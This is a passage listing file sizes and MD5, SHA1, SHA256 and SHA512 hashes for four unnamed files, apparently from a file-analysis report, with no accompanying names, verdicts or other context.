SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
17.5MB
MD5e73ac1027b95fcaf0465259ba31e2acb
SHA1a482d652474da64e916ec57b658be227c3c1d581
SHA256481b291bedb7407588308eae3e12c5db66054426e2e7d25dc366bc33b162bb81
SHA512c471caf117aa2c70a06f818b391de5be85488fa0d8f02e5d9f59ff93a65bcf431bff2be0899e9814c2e45e421e14609e2651579abbe7c2d4f998f9b274b09e73